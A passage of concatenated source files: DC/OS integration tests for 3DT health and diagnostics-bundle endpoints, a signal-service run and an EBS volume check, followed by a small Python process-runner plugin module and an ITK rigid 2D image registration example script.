'constraints': [['hostname', 'LIKE', hosts[0]]],
})
write_app['container']['type'] = 'MESOS'
write_app['container']['volumes'][0]['containerPath'] = mesos_volume_path
write_app['container']['volumes'][0]['external']['size'] = 1
read_app = copy.deepcopy(base_app)
read_app.update({
'id': '/{}/read'.format(test_label),
'cmd': (
# Diff the file and the UUID.
'echo "{test_uuid}" | diff - {volume_path}/test && '
'while true; do sleep 1000; done'
).format(test_uuid=test_uuid, volume_path=docker_volume_path),
'constraints': [['hostname', 'LIKE', hosts[1]]],
})
read_app['container'].update({
'type': 'DOCKER',
'docker': {
'image': 'busybox',
'network': 'HOST',
}
})
read_app['container']['volumes'][0]['containerPath'] = docker_volume_path
deploy_kwargs = {
'check_health': False,
# A volume might fail to attach because EC2. We can tolerate that and retry.
'ignore_failed_tasks': True,
}
try:
cluster.deploy_marathon_app(write_app, **deploy_kwargs)
cluster.destroy_marathon_app(write_app['id'])
cluster.deploy_marathon_app(read_app, **deploy_kwargs)
cluster.destroy_marathon_app(read_app['id'])
finally:
try:
_delete_ec2_volume(test_label)
except Exception as ex:
raise Exception("Failed to clean up volume {}: {}".format(test_label, ex)) from ex
def make_3dt_request(ip, endpoint, cluster, port=80):
"""
a helper function to get info from 3dt endpoint. Default port is 80 for pulled data from agents.
if a destination port in 80, that means all requests should go though master (adminrouter) and we can re-use
cluster.get otherwise we can query 3dt agents directly to port 61001 (agent-adminrouter).
"""
if port == 80:
assert endpoint.startswith('/'), 'endpoint {} must start with /'.format(endpoint)
logging.info('GET {}'.format(endpoint))
json_response = cluster.get(path=endpoint).json()
logging.info('Response: {}'.format(json_response))
return json_response
url = 'http://{}:{}/{}'.format(ip, port, endpoint.lstrip('/'))
logging.info('GET {}'.format(url))
request = requests.get(url)
assert request.ok
try:
json_response = request.json()
logging.info('Response: {}'.format(json_response))
except ValueError:
logging.error('Coult not deserialized json response from {}'.format(url))
raise
assert len(json_response) > 0, 'json response is invalid from {}'.format(url)
return json_response
def test_3dt_health(cluster):
"""
test health endpoint /system/health/v1
"""
required_fields = ['units', 'hostname', 'ip', 'dcos_version', 'node_role', 'mesos_id', '3dt_version', 'system']
required_fields_unit = ['id', 'health', 'output', 'description', 'help', 'name']
required_system_fields = ['memory', 'load_avarage', 'partitions', 'disk_usage']
# Check all masters 3DT instances on base port since this is extra-cluster request (outside localhost)
for host in cluster.masters:
response = make_3dt_request(host, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT)
assert len(response) == len(required_fields), 'response must have the following fields: {}'.format(
', '.join(required_fields)
)
# validate units
assert 'units' in response, 'units field not found'
assert isinstance(response['units'], list), 'units field must be a list'
assert len(response['units']) > 0, 'units field cannot be empty'
for unit in response['units']:
assert len(unit) == len(required_fields_unit), 'unit must have the following fields: {}'.format(
', '.join(required_fields_unit)
)
for required_field_unit in required_fields_unit:
assert required_field_unit in unit, '{} must be in a unit repsonse'
# id, health and description cannot be empty
assert unit['id'], 'id field cannot be empty'
assert unit['health'] in [0, 1], 'health field must be 0 or 1'
assert unit['description'], 'description field cannot be empty'
# check all required fields but units
for required_field in required_fields[1:]:
assert required_field in response, '{} field not found'.format(required_field)
assert response[required_field], '{} cannot be empty'.format(required_field)
# check system metrics
assert len(response['system']) == len(required_system_fields), 'fields required: {}'.format(
', '.join(required_system_fields))
for sys_field in required_system_fields:
assert sys_field in response['system'], 'system metric {} is missing'.format(sys_field)
assert response['system'][sys_field], 'system metric {} cannot be empty'.format(sys_field)
# Check all agents running 3DT behind agent-adminrouter on 61001
for host in cluster.slaves:
response = make_3dt_request(host, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT_AGENT)
assert len(response) == len(required_fields), 'response must have the following fields: {}'.format(
', '.join(required_fields)
)
# validate units
assert 'units' in response, 'units field not found'
assert isinstance(response['units'], list), 'units field must be a list'
assert len(response['units']) > 0, 'units field cannot be empty'
for unit in response['units']:
assert len(unit) == len(required_fields_unit), 'unit must have the following fields: {}'.format(
', '.join(required_fields_unit)
)
for required_field_unit in required_fields_unit:
assert required_field_unit in unit, '{} must be in a unit repsonse'
# id, health and description cannot be empty
assert unit['id'], 'id field cannot be empty'
assert unit['health'] in [0, 1], 'health field must be 0 or 1'
assert unit['description'], 'description field cannot be empty'
# check all required fields but units
for required_field in required_fields[1:]:
assert required_field in response, '{} field not found'.format(required_field)
assert response[required_field], '{} cannot be empty'.format(required_field)
# check system metrics
assert len(response['system']) == len(required_system_fields), 'fields required: {}'.format(
', '.join(required_system_fields))
for sys_field in required_system_fields:
assert sys_field in response['system'], 'system metric {} is missing'.format(sys_field)
assert response['system'][sys_field], 'system metric {} cannot be empty'.format(sys_field)
def validate_node(nodes):
assert isinstance(nodes, list), 'input argument must be a list'
assert len(nodes) > 0, 'input argument cannot be empty'
required_fields = ['host_ip', 'health', 'role']
for node in nodes:
logging.info('check node reponse: {}'.format(node))
assert len(node) == len(required_fields), 'node should have the following fields: {}'.format(
', '.join(required_fields)
)
for required_field in required_fields:
assert required_field in node, '{} must be in node'.format(required_field)
# host_ip, health, role fields cannot be empty
assert node['health'] in [0, 1], 'health must be 0 or 1'
assert node['host_ip'], 'host_ip cannot be empty'
assert node['role'], 'role cannot be empty'
def test_3dt_nodes(cluster):
"""
test a list of nodes with statuses endpoint /system/health/v1/nodes
"""
for master in cluster.masters:
response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes', cluster)
assert len(response) == 1, 'nodes response must have only one field: nodes'
assert 'nodes' in response
assert isinstance(response['nodes'], list)
assert len(response['nodes']) == len(cluster.masters + cluster.all_slaves), (
'a number of nodes in response must be {}'.format(len(cluster.masters + cluster.all_slaves)))
# test nodes
validate_node(response['nodes'])
def test_3dt_nodes_node(cluster):
"""
test a specific node enpoint /system/health/v1/nodes/<node>
"""
for master in cluster.masters:
# get a list of nodes
response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes', cluster)
nodes = list(map(lambda node: node['host_ip'], response['nodes']))
logging.info('received the following nodes: {}'.format(nodes))
for node in nodes:
node_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes/{}'.format(node), cluster)
validate_node([node_response])
def validate_units(units):
assert isinstance(units, list), 'input argument must be list'
assert len(units) > 0, 'input argument cannot be empty'
required_fields = ['id', 'name', 'health', 'description']
for unit in units:
logging.info('validating unit {}'.format(unit))
assert len(unit) == len(required_fields), 'a unit must have the following fields: {}'.format(
', '.join(required_fields)
)
for required_field in required_fields:
assert required_field in unit, 'unit response must have field: {}'.format(required_field)
# a unit must have all 3 fields not empty
assert unit['id'], 'id field cannot be empty'
assert unit['name'], 'name field cannot be empty'
assert unit['health'] in [0, 1], 'health must be 0 or 1'
assert unit['description'], 'description field cannot be empty'
def validate_unit(unit):
assert isinstance(unit, dict), 'input argument must be a dict'
logging.info('validating unit: {}'.format(unit))
required_fields = ['id', 'health', 'output', 'description', 'help', 'name']
assert len(unit) == len(required_fields), 'unit must have the following fields: {}'.format(
', '.join(required_fields)
)
for required_field in required_fields:
assert required_field in unit, '{} must be in a unit'.format(required_field)
# id, name, health, description, help should not be empty
assert unit['id'], 'id field cannot be empty'
assert unit['name'], 'name field cannot be empty'
assert unit['health'] in [0, 1], 'health must be 0 or 1'
assert unit['description'], 'description field cannot be empty'
assert unit['help'], 'help field cannot be empty'
def test_3dt_nodes_node_units(cluster):
"""
test a list of units from a specific node, endpoint /system/health/v1/nodes/<node>/units
"""
for master in cluster.masters:
# get a list of nodes
response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes', cluster)
nodes = list(map(lambda node: node['host_ip'], response['nodes']))
logging.info('received the following nodes: {}'.format(nodes))
for node in nodes:
node_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes/{}'.format(node), cluster)
logging.info('node reponse: {}'.format(node_response))
units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes/{}/units'.format(node), cluster)
logging.info('units reponse: {}'.format(units_response))
assert len(units_response) == 1, 'unit response should have only 1 field `units`'
assert 'units' in units_response
validate_units(units_response['units'])
def test_3dt_nodes_node_units_unit(cluster):
"""
test a specific unit for a specific node, endpoint /system/health/v1/nodes/<node>/units/<unit>
"""
for master in cluster.masters:
response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes', cluster)
nodes = list(map(lambda node: node['host_ip'], response['nodes']))
for node in nodes:
units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes/{}/units'.format(node), cluster)
unit_ids = list(map(lambda unit: unit['id'], units_response['units']))
logging.info('unit ids: {}'.format(unit_ids))
for unit_id in unit_ids:
validate_unit(
make_3dt_request(master, BASE_ENDPOINT_3DT + '/nodes/{}/units/{}'.format(node, unit_id), cluster))
def test_3dt_units(cluster):
"""
test a list of collected units, endpoint /system/health/v1/units
"""
# get all unique unit names
all_units = set()
for node in cluster.masters:
node_response = make_3dt_request(node, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT)
for unit in node_response['units']:
all_units.add(unit['id'])
for node in cluster.all_slaves:
node_response = make_3dt_request(node, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT_AGENT)
for unit in node_response['units']:
all_units.add(unit['id'])
logging.info('Master units: {}'.format(all_units))
# test agaist masters
for master in cluster.masters:
units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units', cluster)
validate_units(units_response['units'])
pulled_units = list(map(lambda unit: unit['id'], units_response['units']))
logging.info('collected units: {}'.format(pulled_units))
assert set(pulled_units) == all_units, 'not all units have been collected by 3dt puller, missing: {}'.format(
set(pulled_units).symmetric_difference(all_units)
)
def test_3dt_units_unit(cluster):
"""
test a unit response in a right format, endpoint: /system/health/v1/units/<unit>
"""
for master in cluster.masters:
units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units', cluster)
pulled_units = list(map(lambda unit: unit['id'], units_response['units']))
for unit in pulled_units:
unit_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units/{}'.format(unit), cluster)
validate_units([unit_response])
def make_nodes_ip_map(cluster):
"""
a helper function to make a map detected_ip -> external_ip
"""
node_private_public_ip_map = {}
for node in cluster.masters:
detected_ip = make_3dt_request(node, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT)['ip']
node_private_public_ip_map[detected_ip] = node
for node in cluster.slaves:
detected_ip = make_3dt_request(node, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT_AGENT)['ip']
node_private_public_ip_map[detected_ip] = node
logging.info('detected ips: {}'.format(node_private_public_ip_map))
return node_private_public_ip_map
def test_3dt_units_unit_nodes(cluster):
"""
test a list of nodes for a specific unit, endpoint /system/health/v1/units/<unit>/nodes
"""
nodes_ip_map = make_nodes_ip_map(cluster)
for master in cluster.masters:
units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units', cluster)
pulled_units = list(map(lambda unit: unit['id'], units_response['units']))
for unit in pulled_units:
nodes_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units/{}/nodes'.format(unit), cluster)
validate_node(nodes_response['nodes'])
# make sure dcos-mesos-master.service has master nodes and dcos-mesos-slave.service has agent nodes
master_nodes_response = make_3dt_request(
master, BASE_ENDPOINT_3DT + '/units/dcos-mesos-master.service/nodes', cluster)
master_nodes = list(map(lambda node: nodes_ip_map.get(node['host_ip']), master_nodes_response['nodes']))
logging.info('master_nodes: {}'.format(master_nodes))
assert len(master_nodes) == len(cluster.masters), '{} != {}'.format(master_nodes, cluster.masters)
assert set(master_nodes) == set(cluster.masters), 'a list of difference: {}'.format(
set(master_nodes).symmetric_difference(set(cluster.masters))
)
agent_nodes_response = make_3dt_request(
master, BASE_ENDPOINT_3DT + '/units/dcos-mesos-slave.service/nodes', cluster)
agent_nodes = list(map(lambda node: nodes_ip_map.get(node['host_ip']), agent_nodes_response['nodes']))
logging.info('aget_nodes: {}'.format(agent_nodes))
assert len(agent_nodes) == len(cluster.slaves), '{} != {}'.format(agent_nodes, cluster.slaves)
def test_3dt_units_unit_nodes_node(cluster):
"""
test a specific node for a specific unit, endpoint /system/health/v1/units/<unit>/nodes/<node>
"""
required_node_fields = ['host_ip', 'health', 'role', 'output', 'help']
for master in cluster.masters:
units_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units', cluster)
pulled_units = list(map(lambda unit: unit['id'], units_response['units']))
logging.info('pulled units: {}'.format(pulled_units))
for unit in pulled_units:
nodes_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/units/{}/nodes'.format(unit), cluster)
pulled_nodes = list(map(lambda node: node['host_ip'], nodes_response['nodes']))
logging.info('pulled nodes: {}'.format(pulled_nodes))
for node in pulled_nodes:
node_response = make_3dt_request(
master, BASE_ENDPOINT_3DT + '/units/{}/nodes/{}'.format(unit, node), cluster)
logging.info('node response: {}'.format(node_response))
assert len(node_response) == len(required_node_fields), 'required fields: {}'.format(
', '.format(required_node_fields)
)
for required_node_field in required_node_fields:
assert required_node_field in node_response, 'field {} must be set'.format(required_node_field)
# host_ip, health, role, help cannot be empty
assert node_response['host_ip'], 'host_ip field cannot be empty'
assert node_response['health'] in [0, 1], 'health must be 0 or 1'
assert node_response['role'], 'role field cannot be empty'
assert node_response['help'], 'help field cannot be empty'
def test_3dt_report(cluster):
"""
test 3dt report endpoint /system/health/v1/report
"""
for master in cluster.masters:
report_response = make_3dt_request(master, BASE_ENDPOINT_3DT + '/report', cluster)
assert 'Units' in report_response
assert len(report_response['Units']) > 0
assert 'Nodes' in report_response
assert len(report_response['Nodes']) > 0
@pytest.mark.skipif(os.getenv('TEST_ENV') == 'vagrant', reason="Sometimes vagrant sucks, sometimes.")
def test_signal_service(registry_cluster):
"""
signal-service runs on an hourly timer, this test runs it as a one-off
and pushes the results to the test_server app for easy retrieval
"""
cluster = registry_cluster
test_server_app_definition, _ = cluster.get_base_testapp_definition()
service_points = cluster.deploy_marathon_app(test_server_app_definition)
@retrying.retry(wait_fixed=1000, stop_max_delay=120*1000)
def wait_for_endpoint():
"""Make sure test server is available before posting to it"""
r = requests.get('http://{}:{}/signal_test_cache'.format(
service_points[0].host,
service_points[0].port))
assert r.status_code == 200
wait_for_endpoint()
test_host = service_points[0].host
test_port = service_points[0].port
test_cache_url = "http://{}:{}/signal_test_cache".format(test_host, test_port)
cmd = """
ID_PATH="/${PWD}/test-cluster-id"
echo 'test-id' > $ID_PATH
/opt/mesosphere/bin/dcos-signal \
-cluster-id-path $ID_PATH \
-test-url %s
sleep 3600
""" % test_cache_url
print("CMD: {}".format(cmd))
test_uuid = uuid.uuid4().hex
signal_app_definition = {
'id': "/integration-test-signal-service-oneshot-%s" % test_uuid,
'cmd': cmd,
'cpus': 0.1,
'mem': 64,
'instances': 1,
'healthChecks': [{
'protocol': 'COMMAND',
'command': {
'value': 'curl {} > tmp; test -s tmp'.format(test_cache_url)
},
'gracePeriodSeconds': 0,
'intervalSeconds': 10,
'timeoutSeconds': 10,
'maxConsecutiveFailures': 1,
'ignoreHttp1xx': False}]
}
cluster.deploy_marathon_app(signal_app_definition, ignore_failed_tasks=True)
r = requests.get(test_cache_url)
# Handy for diagnosing strange signal service test behavior, not sure if we should
# leave these in for master branch, or remove for the final PR.
print('TESTING SIGNAL RETURN:\n{}'.format(r.text))
print('CACHE SERVER STATUS:\n{}'.format(r.status_code))
r_data = json.loads(r.json())
cluster.destroy_marathon_app(signal_app_definition['id'])
cluster.destroy_marathon_app(test_server_app_definition['id'])
exp_data = {
'diagnostics': {
'event': 'health',
'anonymousId': 'test-id',
'properties': {}
},
'cosmos': {
'event': 'package_list',
'anonymousId': 'test-id',
'properties': {}
},
'mesos': {
'event': 'mesos_track',
'anonymousId': 'test-id',
'properties': {}
}
}
# Generic properties which are the same between all tracks
generic_properties = {
'provider': cluster.provider,
'source': 'cluster',
'clusterId': 'test-id',
'customerKey': '',
'environmentVersion': '',
'variant': 'open'
}
# Insert the generic property data which is the same between all signal tracks
exp_data['diagnostics']['properties'].update(generic_properties)
exp_data['cosmos']['properties'].update(generic_properties)
exp_data['mesos']['properties'].update(generic_properties)
# Insert all the diagnostics data programmatically
master_units = [
'adminrouter-service',
'cosmos-service',
'exhibitor-service',
'history-service',
'logrotate-master-service',
'logrotate-master-timer',
'marathon-service',
'mesos-dns-service',
'mesos-master-service',
'metronome-service',
'signal-service']
all_node_units = [
'adminrouter-reload-service',
'adminrouter-reload-timer',
'3dt-service',
'epmd-service',
'gen-resolvconf-service',
'gen-resolvconf-timer',
'minuteman-service',
'navstar-service',
'signal-timer',
'spartan-service',
'spartan-watchdog-service',
'spartan-watchdog-timer']
slave_units = [
'mesos-slave-service',
'vol-discovery-priv-agent-service']
public_slave_units = [
'mesos-slave-public-service',
'vol-discovery-pub-agent-service']
all_slave_units = [
'3dt-socket',
'adminrouter-agent-service',
'logrotate-agent-service',
'logrotate-agent-timer',
'rexray-service']
master_units.append('oauth-service')
for unit in master_units:
exp_data['diagnostics']['properties']["health-unit-dcos-{}-total".format(unit)] = len(cluster.masters)
exp_data['diagnostics']['properties']["health-unit-dcos-{}-unhealthy".format(unit)] = 0
for unit in all_node_units:
exp_data['diagnostics']['properties']["health-unit-dcos-{}-total".format(unit)] = len(
cluster.all_slaves+cluster.masters)
exp_data['diagnostics']['properties']["health-unit-dcos-{}-unhealthy".format(unit)] = 0
for unit in slave_units:
exp_data['diagnostics']['properties']["health-unit-dcos-{}-total".format(unit)] = len(cluster.slaves)
exp_data['diagnostics']['properties']["health-unit-dcos-{}-unhealthy".format(unit)] = 0
for unit in public_slave_units:
exp_data['diagnostics']['properties']["health-unit-dcos-{}-total".format(unit)] = len(cluster.public_slaves)
exp_data['diagnostics']['properties']["health-unit-dcos-{}-unhealthy".format(unit)] = 0
for unit in all_slave_units:
exp_data['diagnostics']['properties']["health-unit-dcos-{}-total".format(unit)] = len(cluster.all_slaves)
exp_data['diagnostics']['properties']["health-unit-dcos-{}-unhealthy".format(unit)] = 0
# Check the entire hash of diagnostics data
assert r_data['diagnostics'] == exp_data['diagnostics']
# Check a subset of things regarding Mesos that we can logically check for
framework_names = [x['name'] for x in r_data['mesos']['properties']['frameworks']]
assert 'marathon' in framework_names
assert 'metronome' in framework_names
# There are no packages installed by default on the integration test, ensure the key exists
assert len(r_data['cosmos']['properties']['package_list']) == 0
def test_mesos_agent_role_assignment(cluster):
for agent in cluster.public_slaves:
r = requests.get('http://{}:5051/state.json'.format(agent))
assert r.json()['flags']['default_role'] == 'slave_public'
for agent in cluster.slaves:
r = requests.get('http://{}:5051/state.json'.format(agent))
assert r.json()['flags']['default_role'] == '*'
def _get_bundle_list(cluster):
list_url = '/system/health/v1/report/diagnostics/list/all'
response = cluster.get(path=list_url).json()
logging.info('GET {}, response: {}'.format(list_url, response))
bundles = []
for _, bundle_list in response.items():
if bundle_list is not None and isinstance(bundle_list, list) and len(bundle_list) > 0:
# append bundles and get just the filename.
bundles += map(lambda s: os.path.basename(s['file_name']), bundle_list)
return bundles
def test_3dt_bundle_create(cluster):
"""
test bundle create functionality
"""
# start the diagnostics bundle job
create_url = '/system/health/v1/report/diagnostics/create'
response = cluster.post(path=create_url, payload={"nodes": ["all"]}).json()
logging.info('POST {}, response: {}'.format(create_url, response))
# make sure the job is done, timeout is 5 sec, wait between retying is 1 sec
status_url = '/system/health/v1/report/diagnostics/status/all'
@retrying.retry(stop_max_delay=8000, wait_fixed=1000)
def wait_for_job():
response = cluster.get(path=status_url).json()
logging.info('GET {}, response: {}'.format(status_url, response))
# check `is_running` attribute for each host. All of them must be False
for _, attributes in response.items():
assert not attributes['is_running']
# sometimes it may take extra seconds to list bundles after the job is finished.
# the job should finish within 5 seconds and listing should be available after 3 seconds.
assert _get_bundle_list(cluster), 'get a list of bundles timeout'
wait_for_job()
# the job should be complete at this point.
# check the listing for a zip file
bundles = _get_bundle_list(cluster)
assert len(bundles) == 1, 'bundle file not found'
assert bundles[0] == response['extra']['bundle_name']
def verify_unit_response(zip_ext_file):
assert isinstance(zip_ext_file, zipfile.ZipExtFile)
unit_output = gzip.decompress(zip_ext_file.read())
# TODO: This seems like a really fragile string to be searching for. This might need to be changed for
# different localizations.
assert 'Hint: You are currently not seeing messages from other users and the system' not in str(unit_output), (
'3dt does not have permission to run `journalctl`')
def test_3dt_bundle_download_and_extract(cluster):
"""
test bundle download and validate zip file
"""
bundles = _get_bundle_list(cluster)
assert bundles
expected_common_files = ['dmesg-0.output.gz', 'opt/mesosphere/active.buildinfo.full.json.gz', '3dt-health.json']
# these files are expected to be in archive for a master host
expected_master_files = ['dcos-mesos-master.service.gz'] + expected_common_files
# for agent host
expected_agent_files = ['dcos-mesos-slave.service.gz'] + expected_common_files
# for public agent host
expected_public_agent_files = ['dcos-mesos-slave-public.service.gz'] + expected_common_files
with tempfile.TemporaryDirectory() as tmp_dir:
download_base_url = '/system/health/v1/report/diagnostics/serve'
for bundle in bundles:
bundle_full_location = os.path.join(tmp_dir, bundle)
with open(bundle_full_location, 'wb') as f:
r = cluster.get(path=os.path.join(download_base_url, bundle), stream=True)
for chunk in r.iter_content(1024):
f.write(chunk)
# validate bundle zip file.
assert zipfile.is_zipfile(bundle_full_location)
z = zipfile.ZipFile(bundle_full_location)
# get a list of all files in a zip archive.
archived_items = z.namelist()
# make sure all required log files for master node are in place.
for master_ip in cluster.masters:
master_folder = master_ip + '_master/'
# try to load 3dt health report and validate the report is for this host
health_report = json.loads(z.read(master_folder + '3dt-health.json').decode())
assert 'ip' in health_report
assert health_report['ip'] == master_ip
# make sure systemd unit output is correct and does not contain error message
gzipped_unit_output = z.open(master_folder + 'dcos-mesos-master.service.gz')
verify_unit_response(gzipped_unit_output)
for expected_master_file in expected_master_files:
expected_file = master_folder + expected_master_file
assert expected_file in archived_items, 'expecting {} in {}'.format(expected_file, archived_items)
# make sure all required log files for agent node are in place.
for slave_ip in cluster.slaves:
agent_folder = slave_ip + '_agent/'
# try to load 3dt health report and validate the report is for this host
health_report = json.loads(z.read(agent_folder + '3dt-health.json').decode())
assert 'ip' in health_report
assert health_report['ip'] == slave_ip
# make sure systemd unit output is correct and does not contain error message
gzipped_unit_output = z.open(agent_folder + 'dcos-mesos-slave.service.gz')
verify_unit_response(gzipped_unit_output)
for expected_agent_file in expected_agent_files:
expected_file = agent_folder + expected_agent_file
assert expected_file in archived_items, 'expecting {} in {}'.format(expected_file, archived_items)
# make sure all required log files for public agent node are in place.
for public_slave_ip in cluster.public_slaves:
agent_public_folder = public_slave_ip + '_agent_public/'
# try to load 3dt health report and validate the report is for this host
health_report = json.loads(z.read(agent_public_folder + '3dt-health.json').decode())
assert 'ip' in health_report
assert health_report['ip'] == public_slave_ip
# make sure systemd unit output is correct and does not contain error message
gzipped_unit_output = z.open(agent_public_folder + 'dcos-mesos-slave-public.service.gz')
verify_unit_response(gzipped_unit_output)
for expected_public_agent_file in expected_public_agent_files:
expected_file = agent_public_folder + expected_public_agent_file
assert expected_file in archived_items, ('expecting {} in {}'.format(expected_file, archived_items))
def test_bundle_delete(cluster):
bundles = _get_bundle_list(cluster)
assert bundles, 'no bundles found'
delete_base_url = '/system/health/v1/report/diagnostics/delete'
for bundle in bundles:
cluster.post(os.path.join(delete_base_url, bundle))
bundles = _get_bundle_list(cluster)
assert len(bundles) == 0, 'Could not remove bundles {}'.format(bundles)
def test_diagnostics_bundle_status(cluster):
# validate diagnostics job status response
diagnostics_bundle_status = cluster.get(path='/system/health/v1/report/diagnostics/status/all').json()
required_status_fields = ['is_running', 'status', 'errors', 'last_bundle_dir', 'job_started', 'job_ended',
'job_duration', 'diagnostics_bundle_dir', 'diagnostics_job_timeout_min',
'journald_logs_since_hours', 'diagnostics_job_get_since_url_timeout_min',
'command_exec_timeout_sec', 'diagnostics_partition_disk_usage_percent']
for _, properties in diagnostics_bundle_status.items():
assert len(properties) == len(required_status_fields), 'response must have the following fields: {}'.format(
required_status_fields
)
for required_status_field in required_status_fields:
assert required_status_field in properties, 'property {} not found'.format(required_status_field)
| movicha/dcos | packages/dcos-integration-test/extra/integration_test.py | Python | apache-2.0 | 79,003 |
import shlex
import time
class Plugin(object):
def __init__(self):
pass
class Debug(Plugin):
def __init__(self):
super(Debug, self).__init__()
self._prefix = shlex.split("gdb --batch --quiet -ex run -ex \"bt\" -ex quit --args")
def on_program_init(self, program, **kwargs):
program._debug = kwargs.get("debug", False)
if program._debug:
program.command = self._prefix + program.command
def on_program_start(self, program, **kwargs):
if program._debug:
program.announce("Entering debug mode: %s" % program.command)
class Wait(Plugin):
def __init__(self):
super(Wait, self).__init__()
def on_program_init(self, program, **kwargs):
program._wait = kwargs.get("wait", 0)
def on_program_started(self, program, **kwargs):
wait = getattr(program, "_wait", 0)
if wait > 0:
time.sleep(wait)
def on_program_stopped(self, program, **kwargs):
wait = getattr(program, "_wait", 0)
if wait > 0:
time.sleep(wait)
class ExportEnvironment(Plugin):
def __init__(self):
super(ExportEnvironment, self).__init__()
def on_program_start(self, program, **kwargs):
env = " ".join(["\"{}={}\"".format(k, v) for k, v in program.environment.items()])
if not program.directory is None:
program.announce("Directory: " + program.directory)
program.announce("Environment: " + env)
| lukacu/ignition | ignition/plugin.py | Python | mit | 1,491 |
#==========================================================================
#
# Copyright Insight Software Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#==========================================================================*/
from InsightToolkit import *
from sys import argv
#
# Read the fixed and moving images using filenames
# from the command line arguments
#
fixedImageReader = itkImageFileReaderF2_New()
movingImageReader = itkImageFileReaderF2_New()
fixedImageReader.SetFileName( argv[1] )
movingImageReader.SetFileName( argv[2] )
fixedImageReader.Update()
movingImageReader.Update()
fixedImage = fixedImageReader.GetOutput()
movingImage = movingImageReader.GetOutput()
#
# Instantiate the classes for the registration framework
#
registration = itkImageRegistrationMethodF2F2_New()
imageMetric = itkMeanSquaresImageToImageMetricF2F2_New()
transform = itkCenteredRigid2DTransform_New()
optimizer = itkRegularStepGradientDescentOptimizer_New()
interpolator = itkLinearInterpolateImageFunctionF2D_New()
registration.SetOptimizer( optimizer.GetPointer() )
registration.SetTransform( transform.GetPointer() )
registration.SetInterpolator( interpolator.GetPointer() )
registration.SetMetric( imageMetric.GetPointer() )
registration.SetFixedImage( fixedImage )
registration.SetMovingImage( movingImage )
registration.SetFixedImageRegion( fixedImage.GetBufferedRegion() )
#
# Initial transform parameters
#
transform.SetAngle( 0.0 );
# center of the fixed image
fixedSpacing = fixedImage.GetSpacing()
fixedOrigin = fixedImage.GetOrigin()
fixedSize = fixedImage.GetLargestPossibleRegion().GetSize()
centerFixed = ( fixedOrigin.GetElement(0) + fixedSpacing.GetElement(0) * fixedSize.GetElement(0) / 2.0,
fixedOrigin.GetElement(1) + fixedSpacing.GetElement(1) * fixedSize.GetElement(1) / 2.0 )
# center of the moving image
movingSpacing = movingImage.GetSpacing()
movingOrigin = movingImage.GetOrigin()
movingSize = movingImage.GetLargestPossibleRegion().GetSize()
centerMoving = ( movingOrigin.GetElement(0) + movingSpacing.GetElement(0) * movingSize.GetElement(0) / 2.0,
movingOrigin.GetElement(1) + movingSpacing.GetElement(1) * movingSize.GetElement(1) / 2.0 )
# transform center
center = transform.GetCenter()
center.SetElement( 0, centerFixed[0] )
center.SetElement( 1, centerFixed[1] )
# transform translation
translation = transform.GetTranslation()
translation.SetElement( 0, centerMoving[0] - centerFixed[0] )
translation.SetElement( 1, centerMoving[1] - centerFixed[1] )
initialParameters = transform.GetParameters()
print "Initial Parameters: "
print "Angle: %f" % (initialParameters.GetElement(0), )
print "Center: %f, %f" % ( initialParameters.GetElement(1), initialParameters.GetElement(2) )
print "Translation: %f, %f" % (initialParameters.GetElement(3), initialParameters.GetElement(4))
registration.SetInitialTransformParameters( initialParameters )
#
# Define optimizer parameters
#
# optimizer scale
translationScale = 1.0 / 1000.0
optimizerScales = itkArrayD( transform.GetNumberOfParameters() )
optimizerScales.SetElement(0, 1.0)
optimizerScales.SetElement(1, translationScale)
optimizerScales.SetElement(2, translationScale)
optimizerScales.SetElement(3, translationScale)
optimizerScales.SetElement(4, translationScale)
optimizer.SetScales( optimizerScales )
optimizer.SetMaximumStepLength( 0.1 )
optimizer.SetMinimumStepLength( 0.001 )
optimizer.SetNumberOfIterations( 200 )
#
# Iteration Observer
#
def iterationUpdate():
currentParameter = transform.GetParameters()
print "M: %f P: %f %f %f %f %f " % ( optimizer.GetValue(),
currentParameter.GetElement(0),
currentParameter.GetElement(1),
currentParameter.GetElement(2),
currentParameter.GetElement(3),
currentParameter.GetElement(4) )
iterationCommand = itkPyCommand_New()
iterationCommand.SetCommandCallable( iterationUpdate )
optimizer.AddObserver( itkIterationEvent(), iterationCommand.GetPointer() )
print "Starting registration"
#
# Start the registration process
#
registration.StartRegistration()
#
# Get the final parameters of the transformation
#
finalParameters = registration.GetLastTransformParameters()
print "Final Registration Parameters "
print "Angle in radians = %f" % finalParameters.GetElement(0)
print "Rotation Center X = %f" % finalParameters.GetElement(1)
print "Rotation Center Y = %f" % finalParameters.GetElement(2)
print "Translation in X = %f" % finalParameters.GetElement(3)
print "Translation in Y = %f" % finalParameters.GetElement(4)
# Now, we use the final transform for resampling the moving image.
resampler = itkResampleImageFilterF2F2_New()
resampler.SetTransform( transform.GetPointer() )
resampler.SetInput( movingImage )
region = fixedImage.GetLargestPossibleRegion()
resampler.SetSize( region.GetSize() )
resampler.SetOutputSpacing( fixedImage.GetSpacing() )
resampler.SetOutputDirection( fixedImage.GetDirection() )
resampler.SetOutputOrigin( fixedImage.GetOrigin() )
